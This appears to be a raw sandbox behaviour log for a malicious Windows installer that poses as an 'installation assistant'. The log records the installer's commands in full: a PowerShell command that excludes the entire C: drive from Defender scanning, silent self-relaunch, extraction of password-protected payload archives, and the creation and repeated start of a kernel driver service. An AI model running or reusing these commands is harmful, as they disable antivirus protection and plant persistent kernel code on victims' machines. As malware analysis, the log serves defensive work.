Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00E928E3 appears 34 times
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000000.2124833248.0000000000E99000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b1.0.2.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.2126982219.000000007F21A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b1.0.2.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.2126523988.00000000030DE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b1.0.2.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b1.0.2.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.drBinary string: \Device\TfSysMon
Source: tProtect.dll.12.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal80.evad.winEXE@135/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6CC45D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6CC45D60
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E99313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,10_2_00E99313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00EA3D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00EA3D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00E99252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,10_2_00E99252
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6CC45240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,6_2_6CC45240
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile created: C:\Program Files (x86)\Windows NT\is-83E4T.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2496:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4552:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4876:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5208:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4156:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5484:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4892:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5892:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:800:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6496:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3048:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3064:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3540:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2404:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5396:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2896:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6228:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2188:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1280:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6244:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1464:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3532:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5176:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2532:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5368:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6548:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3984:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6112:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeFile created: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmpJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.drBinary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.drBinary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp, is-EIO1L.tmp.6.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp "C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$103DE,4753116,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe"
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp "C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$203E4,4753116,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp "C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$103DE,4753116,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp "C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$203E4,4753116,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
